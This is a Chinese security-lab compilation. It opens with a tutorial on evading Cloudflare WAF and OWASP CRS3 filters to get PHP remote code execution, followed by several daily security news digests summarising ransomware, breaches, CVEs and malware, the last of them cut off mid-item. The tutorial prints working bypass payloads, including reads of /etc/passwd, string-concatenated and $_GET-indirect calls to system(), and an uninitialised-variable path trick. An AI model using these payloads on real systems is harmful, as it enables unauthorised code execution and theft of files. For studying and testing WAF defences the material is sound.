在测试绕过 WAF 执行远程代码之前，首先构造一个简单的、易受攻击的远程代码执行脚本，内容如图： 第 6 行是一个比较明显的命令执行代码，第 3 行尝试拦截 system、exec 或 passthru 等函数（PHP 中有许多其他函数可以执行系统命令，这三个是最常见的）。 这个脚本部署在 Cloudflare WAF 和 ModSecurity + OWASP CRS3 之后。对于第一个测试，尝试读取 passwd 的内容； /cfwaf.php?code=system("cat /etc/passwd"); 可以看到，被 CloudFlare 拦截了，我们可以尝试使用未初始化变量的方式绕过，比如： cat /etc$u/passwd Cloudflare WAF 已被绕过，但是由于脚本检查敏感函数，所以被脚本拦截，那么如何绕过脚本的函数检测呢？我们看看关于字符串的 PHP 文档： https://secure.php.net/manual/en/language.types.string.phpPHP 字符串转义序列: [0–7]{1,3} 八进制表示法的字符序列，它会自动溢出以适应一个字节（例如“\400”===“\000”） \x[0–9A-Fa-f]{1,2} 十六进制字符序列（例如“\x41”） \u{[0–9A-Fa-f]+} Unicode 代码点序列，将作为该代码点的 UTF-8 表示输出到字符串（在 PHP 7.0.0 中添加） 不是每个人都知道 PHP 表示字符串的语法，而“PHP 变量函数”则成为我们绕过过滤器和规则的瑞士军刀。 PHP变量函数 PHP 支持变量函数的概念。这意味着如果变量名后面附加了圆括号，PHP 将寻找与变量求值结果同名的函数，并尝试执行它。除其他事项外，这可用于实现回调、函数表等。 这意味着语法如 $var(args); 和 "sting"(args; 等于 func(args); 。如果我可以通过使用变量或字符串来调用函数，则意味着我可以使用转义序列而不是函数名。这里有一个例子： 第三种语法是十六进制符号的转义字符序列，PHP 将其转换为字符串“system”，然后使用参数“ls”转换为函数系统。让我们尝试使用易受攻击的脚本： 此技术不适用于所有 PHP 函数，变量函数不适用于 echo、print、unset()、isset()、empty()、include、require 。利用包装函数将这些构造中的任何一个用作变量函数。 改进用户输入检测 如果我从易受攻击脚本的用户输入中排除双引号和单引号等字符，会发生什么情况？即使不使用双引号也可以绕过它吗？让我们试试： 正如您在第三行看到的，现在脚本阻止在 $_GET[code] 查询字符串参数中使用“和”。我以前的有效负载现在应该被阻止： 幸运的是，在 PHP 中，我们并不总是需要引号来表示字符串。PHP 使您能够声明元素的类型，例如 $a = (string)foo; 在这种情况下，$a 包含字符串“foo”。此外，圆括号内没有特定类型声明的任何内容都被视为字符串： 在这种情况下，我们有两种方法可以绕过新过滤器：第一种是使用类似 (system)(ls) 的方法；但是我们不能在代码参数中使用“system”，所以我们可以像 (sy.(st).em)(ls); 一样连接字符串。第二种是使用 $GET 变量。如果我发送像 ?a=system&b=ls&code=$GETa 这样的请求；结果是：$GET[a] 将替换为字符串“system”，$GET[b] 将替换为字符串“ls”，我将能够绕过所有过滤器！ 让我们尝试使用第一个有效负载 (sy.(st).em)(whoami)； 和第二个有效载荷 ? ?a=system&b=cat+/etc&c=/passwd&code=$\_GET[a]($\_GET[b].$\_GET[c]); 在这种情况下，没有用，但您甚至可以在函数名称和参数内部插入注释（这可能有助于绕过阻止特定 PHP 函数名称的 WAF 规则集）。以下所有语法均有效： get_defined_functions 函数 此 PHP 函数返回一个多维数组，其中包含所有已定义函数的列表，包括内置（内部）函数和用户定义函数。内部函数可以通过 $arr[“internal”] 访问，用户定义的函数可以使用 $arr[“user”] 访问。例如： 这可能是另一种无需使用其名称即可访问系统功能的方法。如果我对“系统”进行 grep，我可以发现它的索引号并将其用作我的代码执行的字符串： 显然，这应该对我们的 Cloudflare WAF 和脚本过滤器有效： 字符数组 PHP 中的每个字符串都可以用作字符数组（几乎像 Python 那样），您可以使用语法 $string[2] 或 $string[-3] 引用单个字符串字符。这可能是另一种规避阻止 PHP 函数名称的规则的方法。例如，使用这个字符串 $a=”elmsty/ “; 我可以编写语法系统(“ls /tmp”); 如果幸运的话，您可以在脚本文件名中找到所需的所有字符。使用相同的技术，您可以使用类似的方法选择所需的所有字符 OWASP CRS3 有了 OWASP CRS3，一切都变得更难了。首先，使用之前看到的技术，我只能绕过第一个偏执级别，这太神奇了！因为 Paranoia Level 1 只是我们可以在 CRS3 中找到的规则的一小部分，所以这个级别旨在防止任何误报。对于 2 级偏执狂，由于规则 942430“受限 SQL 字符异常检测（args）：超出特殊字符数”，所有事情都变得困难。我能做的只是执行一个不带参数的命令，如“ls”、“whoami”等。但我无法像使用 Cloudflare WAF 那样执行类似 system(“cat /etc/passwd”) 的命令：

1、瑞士政府遭受勒索软件和DDoS攻击的双重打击 https://www.admin.ch/gov/en/start/documentation/media-releases.msg-id-95641.html 瑞士政府近日披露，其IT供应商Xplain遭到了Play勒索软件团伙的攻击，可能导致政府数据泄露。同时，瑞士政府还警告称，其多个网站和在线服务正面临着来自NoName黑客组织的DDoS(分布式拒绝服务)攻击。这两起事件反映了组织和政府在利用第三方服务托管数据和公开提供在线服务时所面临的复杂威胁。据报道，Play勒索软件团伙于2023年5月23日入侵了Xplain，这是一家为瑞士各个政府部门、行政单位甚至军队提供软件解决方案的技术提供 2、Zacks遭遇数据泄露影响880万用户 https://www.bleepingcomputer.com/news/security/have-i-been-pwned-warns-of-new-zacks-data-breach-impacting-8-million/ 据报道，Zacks遭遇了一起较早的、此前未披露的数据泄露事件，影响了880万客户，该数据库现已在黑客论坛上分享。该公司此前曾披露过一起发生在2021年11月至2022年8月期间的数据泄露事件，警告称未经授权的网络入侵者“访问”了约82万客户的个人敏感信息，但Zacks当时声称没有理由相信任何客户信用卡信息、任何其他客户财务信息或任何其他客户个人信息被访问。然而， 3、研究人员分享一种高级的批处理文件混淆技术 https://www.trendmicro.com/en_us/research/23/f/analyzing-the-fud-malware-obfuscation-engine-batcloak.html BatCloak引擎是一种用于混淆批处理文件的高级技术，可以使恶意批处理文件完全无法检测(FUD)，并能够无缝地加载各种恶意软件家族和利用。研究人员在近期的调查中发现，BatCloak引擎被广泛地集成到现代恶意软件中，例如SeroXen远程访问木马(RAT)，并具有显著的安全逃避能力。BatCloak引擎的核心是一个名为BatCloak.exe的可执行文件，它可以接受一个批处理文件作 4、Forta软件漏洞导致医疗供应商数据泄露 https://apps.web.maine.gov/online/aeviewer/ME/40/cd6cca3b-8ef7-40fd-8814-d0688c72716a.shtml Forta是一家提供安全文件传输解决方案的软件公司，其GoAnywhere产品可以帮助组织自动化与合作伙伴的数据交换。然而，该产品存在一个漏洞，已经被多个黑客利用来入侵Forta的客户，包括许多医疗行业的实体，导致数百万人的个人信息泄露。最近，一家提供患者债务收集软件的公司Intellihartx(也称为ITx)成为了Forta相关数据泄露事件的最新受害者。该公司在6月8日向缅因州的司法部门提交了一份数据泄露报 5、Visual Studio存在UI漏洞，攻击者可伪造扩展签名 https://www.varonis.com/blog/visual-studio-bug Visual Studio是一款流行的集成开发环境(IDE)，提供了数百种扩展，可以增强其功能和效率。然而，研究人员发现了一个UI漏洞(CVE-2023-28299)，可以让攻击者在安装扩展时伪造扩展签名，从而冒充任何发布者。微软已经在2023年4月11日的补丁周二更新中修复了这个漏洞。这个漏洞的利用方法很简单，只需在扩展的名称中添加足够多的换行符，就可以将安装提示中的其他文本推到下方，使其不可见。攻击者还可以在扩展名称下方添加假的“数字签名”文本，让用户误以为扩展是经过签名的。攻击者可以利用这个漏 6、英国出台新政策，打击授权支付诈骗 https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/1154660/Fraud_Strategy_2023.pdf 授权支付诈骗(APP)是一种常见的网络诈骗形式，指的是诈骗者通过欺骗或威胁的方式，让受害者自己授权向诈骗者的账户转账。这种诈骗往往利用了快速支付服务(Faster Payments Service)的速度和便利性，使受害者难以取消或追回转账。根据英国支付系统监管机构(Payment Systems Regulator)的数据，2021年英国 7、微软 2023 年 6 月周二补丁日修复了 6 个严重漏洞 https://securityaffairs.com/147452/security/microsoft-patch-tuesday-june-2023.html 2023 年 6 月的 Microsoft Patch Tuesday 安全更新修复了多个产品中的 69 个漏洞，包括 Microsoft Windows 和 Windows 组件；办公室和办公室组件；交换服务器；Microsoft Edge（基于 Chromium）；共享服务器；.NET 和 Visual Studio；微软团队；Azure 开发运营；微软动态；和远程桌面客户端。Microsoft 解决的 69 个漏洞中有 6 8、英国通信监管机构 Ofcom 遭 MOVEit 文件传输零日漏洞攻击 https://securityaffairs.com/147396/data-breach/ofcom-hacked-moveit-zero-day.html 在Clop 勒索软件利用 MOVEit 文件传输零日漏洞进行攻击后，英国通信监管机构 Ofcom 遭遇数据泄露。 9、黑客通过冒充新闻记者窃取 300 万美元加密货币 https://www.bleepingcomputer.com/news/cryptocurrency/hackers-steal-3-million-by-impersonating-crypto-news-journalists/ 一个被追踪为“Pink Drainer”的黑客组织正在冒充记者进行网络钓鱼攻击，以破坏 Discord 和 Twitter 帐户以进行加密货币窃取攻击。 10、OpenAI CEO呼吁与中国合作应对AI风险 https://cn.wsj.com/articles/openai-ceo%E5%91%BC%E5%90%81%E4%B8%8E%E4%B8%AD%E5%9B%BD%E5%90%88%E4%BD%9C%E5%BA%94%E5%AF%B9ai%E9%A3%8E%E9%99%A9-41ab03da OpenAI CE0 Sam Altman 通过远程连线的方式参与了一场中国的 AI 会议。他强调了美国和中国研究人员通过合作降低AI系统风险的重要性。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员发现新型恶意软件LOBSHOT https://www.elastic.co/cn/security-labs/elastic-charms-spectralviper 研究人员发现了一种新型恶意软件，命名为LOBSHOT。LOBSHOT是一种利用Windows系统的BITS服务(Background Intelligent Transfer Service)来下载和执行恶意代码的后门程序。BITS服务是一种用于在网络带宽不足时传输文件的技术，通常用于Windows更新或其他应用程序更新。LOBSHOT利用BITS服务的特性，可以绕过防火墙和杀毒软件的检测，实现隐蔽和持久的攻击。研究人员对 LOBSHOT的运行机制和通信协 2、研究人员发现大规模加密货币诈骗活动 https://www.trendmicro.com/en_us/research/23/f/impulse-team-massive-cryptocurrency-scam.html Impulse Team是一个俄语的威胁行为者，他们通过一个名为Impulse Project的联盟计划，运营着一个涉及超过一千个网站的大规模加密货币诈骗活动。这个活动至少从2021年开始，一直持续到现在，虽然有一些个别的报告揭露了其中的部分网站，但没有一个完整的总结。诈骗者的手法是利用高级费用欺诈，让受害者相信他们赢得了一定数量的加密货币。但是，要获得奖励，受害者需要支付一小笔钱，在他们的网站上开设一个账户 3、研究人员揭露图片插入窃取信息攻击技术 https://www.avanan.com/blog/surging-to-inboxes 研究人员发现了一种利用图片插入技术来窃取信息的攻击。图片插入技术是一种在HTML邮件中嵌入图片的方法，可以让收件人在不点击任何链接的情况下就能看到图片。这种技术通常用于跟踪邮件的打开率和用户行为，但也可以被恶意利用。在这种攻击中，黑客发送了一封伪装成来自Microsoft的邮件，声称收件人的Office 365订阅即将到期，并要求他们更新付款信息。邮件中包含了一个图片插入代码，指向了一个恶意网站，该网站会记录收件人的IP地址、地理位置、浏览器类型等信息。这些信息可以帮助黑客定位目标，并为后续的攻击做 4、Strava热力图功能暴露用户家庭地址 https://anupamdas.org/paper/CONPRO2023.pdf Strava是一款流行的跑步伴侣和健身追踪应用，拥有超过1亿用户，可以帮助用户记录他们的心率、活动细节、GPS位置等信息。研究人员发现，热力图这项功能存在一个隐私风险，可能被滥用来识别用户的家庭地址。在这种攻击中，黑客利用公开可用的热力图数据和特定用户的元数据，来跟踪和去匿名化用户。 5、Fortinet修复Fortigate防火墙远程代码执行漏洞 https://olympecyberdefense.fr/1193-2/ 最近，该公司发布了多个版本的FortiOS，即Fortigate防火墙的操作系统/固件，但没有提及它们包含了对CVE-2023-27997的修复，这是一个不需要攻击者登录就可以利用的远程代码执行(RCE)漏洞。该漏洞已经在FortiOS版本7.2.5、7.0.12、6.4.13、6.2.15中得到修复，而且似乎也在v6.0.17中得到修复。企业管理员建议尽快升级Fortigate设备，因为如果这个漏洞还没有被攻击者利用，很可能很快就会被利用。关于CVE-2023-27997的具体细节目前还不清楚。据Olympe Cy 6、本田电商平台被黑客攻破，泄露客户和经销商信息 https://eaton-works.com/2023/06/06/honda-ecommerce-hack 本田汽车公司提供了一个名为本田经销商网站的电商平台，让经销商可以轻松创建网站和销售本田的发电机、割草机、船用发动机等产品。然而，这个平台存在一个严重的安全漏洞，让黑客可以通过一个脆弱的密码重置API，轻松地重置任何账户的密码，并获取该账户的所有数据。黑客Eaton在6月6日公开了这个漏洞的细节，他称他利用这个漏洞成功入侵了本田的电商平台，并获得了完全的管理员权限。Eaton表示，这次攻击并没有影响本田的汽车业务，只影响了发电设备/船用/草坪园艺业务。本田汽车的车主不需要担心，只有那 7、微软警告多阶段 AiTM 网络钓鱼和 BEC 攻击 https://securityaffairs.com/147327/hacking/aitm-bec-attacks.html Microsoft 发现了针对银行和金融服务组织的多阶段中间对手(AiTM) 网络钓鱼和商业电子邮件泄露 (BEC) 攻击。在 AiTM 网络钓鱼中，威胁行为者在目标用户和用户希望访问的网站之间设置代理服务器，该网站是攻击者控制下的网络钓鱼站点。代理服务器允许攻击者访问流量并捕获目标的密码和会话 cookie。微软发现，攻击者最初危害了一个受信任的供应商，然后以 AiTM 攻击和后续 BEC 活动为目标的多个组织。 8、专家发现了新的 MOVEit Transfer SQL 注入漏洞 https://securityaffairs.com/147299/security/new-moveit-transfer-sql-inj.html Progress Software 已发布安全更新，以解决 MOVEit Transfer 应用程序中新的 SQL 注入漏洞。攻击者可以利用MOVEit Transfer解决方案中的SQL注入漏洞窃取敏感信息。 9、三部门发布《关于依法惩治网络暴力违法犯罪的指导意见（征求意见稿）》 https://www.freebuf.com/news/369218.html 为依法惩治网络暴力违法犯罪活动，有效维护公民人格权益和正常网络秩序，根据刑法、刑事诉讼法、民法典、民事诉讼法及治安管理处罚法等有关规定，最高人民法院、最高人民检察院、公安部联合发布了《关于依法惩治网络暴力违法犯罪的指导意见（征求意见稿）》（以下简称《指导意见》）。 10、《我的世界》模组被发现感染恶意程序 Fracturiser https://www.solidot.org/story?sid=75190 为《我的世界（Minecraft）》提供模组的平台 CurseForge 建议用户立即停止下载或更新模组，它托管的模组开发者账号遭到入侵，数十个流行的插件和模组被植入了恶意程序 Fracturise。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员揭露DarkRace勒索软件团伙的真面目 https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/ 最近，研究人员发现了一个名为DarkRace的勒索软件团伙，该团伙通过钓鱼邮件和恶意附件来感染目标系统，然后加密文件并要求赎金。研究人员对DarkRace的攻击方法、赎金要求、支付方式、联系方式等进行了详细的分析，并发现了一些有趣的细节，例如：DarkRace使用了一个自定义的加密算法，称为“DarkRace加密器”，该算法使用了AES-256和RSA-2048来加密文件。 2、黑客利用ChatGPT的自然语言生成技术传播恶意代码 https://vulcan.io/blog/ai-hallucinations-package-risk 近日，安全研究人员发现了一种名为ChatGPT的恶意软件，它可以利用自然语言生成（NLG）技术来制造虚假的信息，从而误导用户或者影响舆论。这种恶意软件可以通过社交媒体、电子邮件或者聊天软件等渠道传播，它可以根据用户的输入或者上下文来生成符合语法和逻辑的假消息，例如谣言、诈骗、政治宣传等。 3、物联网僵尸网络对电信网络发动大规模DDoS攻击 https://pf.content.nokia.com/t00902-trust-threat-intelligence-report/report-nokia-threat-intelligence-report-2023 根据诺基亚的最新报告，物联网（IoT）僵尸网络在2022年对电信网络发动了大规模的分布式拒绝服务（DDoS）攻击，导致网络中断、延迟和质量下降。物联网僵尸网络是指由被黑客控制的大量物联网设备组成的网络，它们可以被用来向目标服务器发送大量的请求，从而使其无法正常提供服务。报告显示，物联网僵尸网络的规模和复杂度都在不断增长，它们可以利用多种技术来隐藏自己的身份和活动，例如 4、Vivaldi浏览器伪装成Edge浏览器来绕过Bing聊天限制 https://vivaldi.com/blog/vivaldi-on-android-6-1/ Vivaldi浏览器是一款基于Chromium的自定义浏览器，它提供了许多独特的功能和选项。最近，Vivaldi浏览器的开发者发现，Bing搜索引擎只允许使用Edge浏览器的用户访问其聊天功能，而其他浏览器的用户则被拒绝。为了解决这个问题，Vivaldi浏览器决定伪装成Edge浏览器来绕过Bing聊天的限制。Vivaldi浏览器的开发者认为，Bing聊天的限制是一种不公平的做法，它违反了网络中立性的原则，也损害了用户的选择权和体验。他们希望Bing能够改变这种做法，对所有浏览器的用户提供同样的服 5、研究人员公开了Win32k提权漏洞CVE-2023-29336的POC https://www.numencyber.com/cve-2023-29336-win32k-analysis/ 研究人员发布了针对Windows操作系统的CVE-2023-29336漏洞的POC(概念验证)。CVE-2023-29336是一种影响Windows操作系统的内核缓冲区溢出漏洞，它存在于Win32k组件中，该组件负责处理用户界面和图形相关的功能。该漏洞可以被本地攻击者利用，通过向Win32k发送特制的消息，触发内核缓冲区溢出，从而执行任意代码，提升权限，绕过安全机制，甚至导致系统崩溃。该漏洞的原因是Win32k在处理某些消息时，没有正确地检查输入参数的长度和类型，导致在分配和 6、北非遭受"隐形士兵"后门间谍攻击 https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/ 北非地区近期发生了一系列高度定向的间谍攻击，攻击者利用了一个名为“隐形士兵”的新型自定义模块化后门。隐形士兵后门是一个未公开的恶意程序，主要用于执行监视功能，如文件窃取、屏幕和麦克风录制、键盘记录和浏览器信息窃取。该后门的命令和控制(C&C)网络是一个更大的基础设施的一部分，至少部分用于对政府实体进行钓鱼攻击。根据钓鱼网站的主题和VirusTotal的提交情况，该活动 7、日本制药巨头受勒索软件攻击，系统下线 https://www.eisai.com/news/2023/news202341.html 日本制药公司Eisai在6月3日发现了一起勒索软件攻击，导致多台服务器被加密。Eisai立即执行了事故应对计划，将系统下线以控制攻击，并启动了调查。Eisai表示，已经成立了一个跨部门的专案组，并在外部专家和执法机构的建议下进行恢复工作和影响范围的评估。此次攻击影响了日本和海外的服务器，包括物流系统，目前尚未恢复。Eisai的企业网站和电子邮件系统仍然正常运行。Eisai表示，目前尚未确定在攻击过程中是否有数据被泄露或窃取。“此次事件对本财年合并业绩预测的潜在影响目前正在仔细审查中，”该公司还说。 8、美国司法部指控两名俄罗斯公民参与Mt. Gox黑客攻击 https://dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/usvbilyuchenkoandvernerindictment.pdf 美国联邦检察官指控两名俄罗斯公民参与了2014年导致加密货币交易平台Mt. Gox破产的盗窃行为，当时Mt. Gox是全球最大的加密货币平台。检察官指控Aleksandr Verner(29岁)和Alexey Bilyuchenko(43岁)从Mt. Gox的热钱包存储中窃取了至少647,000个比特币，并对所得款项进行了洗钱。 9、紧急安全更新： 思科和 VMware 修复关键漏洞 https://www.freebuf.com/news/368976.html VMware已经发布了安全更新，以修复Aria Operations for Networks中可能导致信息泄露和远程代码执行的三个漏洞。在发出警报的同时，思科还对其Expressway系列和网真视频通信服务器（VCS）中的一个关键漏洞进行了修复，该漏洞可以允许具有管理员级别只读凭证的认证攻击者在受影响的系统上将其权限提升到具有读写凭证的管理员。 10、2023 年 OWASP 十大 API 安全风险清单 https://www.freebuf.com/news/368984.html OWASP API 安全项目旨在解决越来越多的组织将潜在敏感 API 作为其软件产品的一部分进行部署的问题，这些 API 通常用于内部任务和与第三方的接口。不幸的是，许多 API 没有经过严格的安全测试。OWASP API 安全项目通过强调不安全 API 中的潜在风险，并说明如何减轻这些风险，为软件开发人员和安全评估人员提供价值。为了实现这一目标，OWASP AP I安全项目创建了一份 10 大 API 安全风险文名单。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、朝鲜黑客组织Kimsuky发起新的社交工程攻击 https://www.sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/ 一个名为Kimsuky的朝鲜黑客组织近期发起了一系列针对政府、军事、外交和研究机构的社交工程攻击，旨在窃取敏感信息和收集战略情报。Kimsuky是一个自2012年以来就活跃的网络间谍组织，曾经针对韩国、美国、俄罗斯、欧洲和联合国等多个国家和组织的目标进行过攻击。 2、Prism Launcher官网被黑客入侵，用户需注意 https://prismlauncher.org/news/cf-compromised-alert/ 根据Prism Launcher官网的公告，该网站在2023年6月7日被一名黑客入侵，导致部分用户的电子邮件地址和密码被泄露。Prism Launcher是一个开源的Minecraft启动器，可以管理多个实例、账户和模组。该网站表示，黑客利用了Cloudflare的一个漏洞，绕过了防火墙，然后利用了一个未知的PHP漏洞，执行了任意代码，从而获取了数据库的访问权限。 3、美国多家机构遭遇匿名苏丹匿名者组织发动的DDoS攻击 https://blog.cyble.com/2023/06/07/anonymous-sudan-launches-fresh-wave-of-ddos-attacks-on-american-organizations-including-microsoft/ 一个名为匿名苏丹(Anonymous Sudan)的黑客组织近期发动了一波针对美国多家机构的分布式拒绝服务(DDoS)攻击，其中包括微软、Lyft和一些医院。匿名苏丹是一个声称从事网络行动主义和黑客活动的组织，他们是更大的匿名(Anonymous)网络的一部分，后者是一个由不同国家和地区的黑客和活动家组成的松散联盟。 4、VMware产品存在严重漏洞，可被远程执行代码 https://www.vmware.com/security/advisories/VMSA-2023-0012.html VMware Aria Operations for Networks(原名vRealize Network Insight)存在一个严重的漏洞(CVE-2023-20887)，可被未经身份验证的攻击者利用，远程执行任意代码。VMware Aria Operations for Networks是一个网络和应用监控工具，可以监控、发现和分析多云环境中的网络和应用，构建一个优化、高可用和安全的网络基础设施。 5、Barracuda建议用户尽快更换Web应用防火墙设备 https://www.barracuda.com/company/legal/esg-vulnerability Barracuda Networks公司近日发布了一份紧急通知，建议用户尽快更换其Web应用防火墙(WAF)设备，因为这些设备已经过时，无法支持最新的安全功能和更新。Barracuda Web应用防火墙是一种保护网站和应用免受各种网络攻击的解决方案，包括OWASP Top 10、零日威胁、数据泄露和应用层拒绝服务(DoS)攻击。 6、Cisco Expressway存在权限提升漏洞，可被本地用户利用 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-priv-esc-Ls2B9t7b 根据Cisco的安全公告，Cisco Expressway存在一个权限提升漏洞(CVE-2023-20887)，可被本地用户利用，获取root用户的权限。Cisco Expressway是一种通信网关，可以提供防火墙外部的用户简单、高度安全的访问所有协作工作负载，包括视频、语音、内容、即时消息和在线状态。 7、美国航空航天国防工业遭严重恶意软件攻击 https://www.freebuf.com/news/368892.html 来自Adlumin威胁研究的研究人员发现了一个新的恶意PowerShell脚本，被称为PowerDrop，被用于针对美国航空航天领域的组织的攻击。这种基于PowerShell的恶意软件使用先进的技术来躲避检测，包括欺骗、编码和加密。 8、美国发射首颗靶场卫星，将举办首场真实环境太空黑客大赛 https://www.secrss.com/articles/55422 已举办三届的Hack-A-Sat黑掉卫星大赛，首次从模拟形式走向实网对抗。今年的DEF CON上将出现大模型黑客赛、卫星黑客赛等热门活动。 9、日本政府针对OpenAI发布个人信息处理和使用指南 https://www.secrss.com/articles/55378 6月2日，日本个人信息保护委员会(PPC)宣布根据《个人信息保护法》(APPI)向ChatGPT开发商OpenAI发布行政指南。 10、FBI警告：有人正利用AI合成的虚假裸照实施敲诈勒索 https://www.bleepingcomputer.com/news/security/sextortionists-are-making-ai-nudes-from-your-social-media-images/ FBI近日警告称，恶意行为者制作深度虚假内容来实施性勒索攻击的趋势正在上升。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Play勒索软件团伙攻击西班牙银行并威胁泄露文件 https://www.malwarebytes.com/blog/news/2023/06/play-ransomware-gang-compromises-spanish-bank-threatens-to-leak-files 近日，Play勒索软件团伙对西班牙银行Globalcaja发起攻击，该团伙在其泄露网站上列出了该银行作为其最新的受害者，并声称窃取了包括护照信息、合同和客户/员工文件等在内的私人和敏感数据。 2、Cyclops勒索团伙向网络犯罪人员提供基于Go的窃取器 https://www.uptycs.com/blog/cyclops-ransomware-stealer-combo 与Cyclops勒索软件有关联的威胁行为者提供了一个信息窃取器恶意软件，该恶意软件旨在从被感染的主机中捕获敏感数据。研究人员说：“这个勒索软件及服务(RaaS)的威胁行为者在论坛上推广其产品。它要求那些使用其恶意软件进行恶意活动的人分享利润。”Cyclops勒索软件以针对所有主要桌面操作系统，包括Windows、macOS和Linux而闻名。 3、LockBit 2.0再度出现，网络安全面临新挑战 https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/ 近日，一款名为LockBit的勒索软件再次出现在网络安全领域。LockBit 2.0采用了更加隐蔽的攻击手段和更高的赎金要求，给企业和个人用户带来了极大的安全威胁。该软件利用Windows操作系统中的漏洞进行攻击，并使用加密算法对受害者的数据进行加密，使其无法访问。 4、免费VPN服务商i2VPN被黑客泄露管理凭证 https://www.safetydetectives.com/news/i2vpn-exposed-telegram/ 2VPN是一款无需注册的免费VPN代理服务器应用，可在Google Play和App Store上下载。2023年5月29日，一些黑客在Telegram上发布了i2VPN的管理凭证，包括管理员的电子邮件地址和密码，并声称已经破解了i2VPN的管理面板，可以访问数十万用户的信息。据Google Play的统计数据，截至2023年5月，i2VPN已经被下载了超过50万次。 5、研究人员发现数万个被感染的安卓应用 https://www.bitdefender.com/blog/labs/tens-of-thousands-of-compromised-android-apps-found-by-bitdefender-anomaly-detection-technology/ 研究人员发现了一场隐藏在全球移动设备上超过六个月的恶意软件活动。这场恶意软件活动的目的是向安卓设备强行推送广告，以获取收益。然而，参与这场活动的黑客可以轻易地改变策略，将用户重定向到其他类型的恶意软件，例如窃取凭证和财务信息的银行木马或勒索软件。截至目前，研究人员已经发现了6万个完全不同的样本(独特的应用)，并且怀疑还有更多的 6、Satacom下载器传播窃取加密货币的浏览器扩展 https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/ Satacom下载器，又称LegionLoader，是一种著名的恶意软件家族，于2019年出现。研究人员发现并报告了一场与Satacom下载器相关的恶意软件传播活动。该活动的主要目的是通过安装一个针对Chromium-based浏览器(如Chrome、Brave和Opera)的扩展程序，来从受害者的账户中窃取加密货币。 7、黑客组织声称对Outlook.com发动DDoS攻击导致服务中断 https://www.bleepingcomputer.com/news/microsoft/outlookcom-hit-by-outages-as-hacktivists-claim-ddos-attacks/ Outlook.com是微软的网络邮件服务，近日遭遇了一系列的服务中断事件，影响了全球数百万用户。6月6日，一个自称Anonymous Sudan的黑客组织在Telegram上宣称，他们对Outlook.com发动了DDoS攻击，以抗议美国干涉苏丹的内政。 8、英国航空公司，BBC和Boots受到Zellis数据泄露的影响 https://securityaffairs.com/147119/data-breach/zellis-data-breach-bbc-ba.html 总部位于英国的薪资公司Zellis受到针对文件传输公司MOVEit的网络安全攻击的影响，英国航空公司是受影响的公司之一。 9、卡巴斯基发布检测零点击iOS攻击的工具 https://www.bleepingcomputer.com/news/security/new-tool-scans-iphones-for-triangulation-malware-infection/ 网络安全公司卡巴斯基（Kaspersky）发布了一个工具，用于检测Apple iPhone和其他iOS设备是否感染了新的“三角测量”恶意软件。 10、月球卫星为太空黑客提供在轨目标 https://www.darkreading.com/ics-ot/moonlighter-satellite-in-orbit-target-space-hackers Moonlighter为红队提供了运营中断的机会，将于8月与DEF CON一起进行计时。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、华硕 RT-AC86U 存在命令注入漏洞 https://www.asus.com.cn/networking-iot-servers/wifi-routers/asus-wifi-routers/rt-ac86u/ 华硕 RT-AC86U是一款双频千兆无线电竞路由器。华硕 RT-AC86U 在固件版本 v3.0.0.4.386.51255 中存在命令注入漏洞。由于路由器没有对特殊字符进行过滤，经过身份认证的攻击者可以进行命令注入，从而执行任意系统命令，获取服务器权限。 2、Clop勒索软件团伙利用MOVEit零日漏洞进行数据窃取 https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-moveit-extortion-attacks Clop勒索软件团伙利用MOVEit Transfer平台的一个零日漏洞，入侵多家公司的服务器并窃取数据。MOVEit Transfer是一个广泛用于企业在互联网上共享大文件的工具，该漏洞允许黑客未经授权访问受影响的MOVEit服务器的数据库。 3、Play勒索软件团伙攻击西班牙银行并威胁泄露文件 https://www.malwarebytes.com/blog/news/2023/06/play-ransomware-gang-compromises-spanish-bank-threatens-to-leak-files 近日，Play勒索软件团伙对西班牙银行Globalcaja发起攻击，该团伙在其泄露网站上列出了该银行作为其最新的受害者，并声称窃取了包括护照信息、合同和客户/员工文件等在内的私人和敏感数据。 4、Google修补了2023年第三个Chrome零日漏洞 https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop.html?m=1 Google在周一发布了一个Chrome 114安全更新，修补了CVE-2023-3079，这是2023年在该浏览器中发现的第三个零日漏洞。Google说，最新版本的Chrome修复了两个缺陷，其中包括CVE-2023-3079，一个影响V8 JavaScript引擎的类型混淆问题。 5、信息窃取程序Bandit Stealer利用Telegram回传数据 https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer Bandit 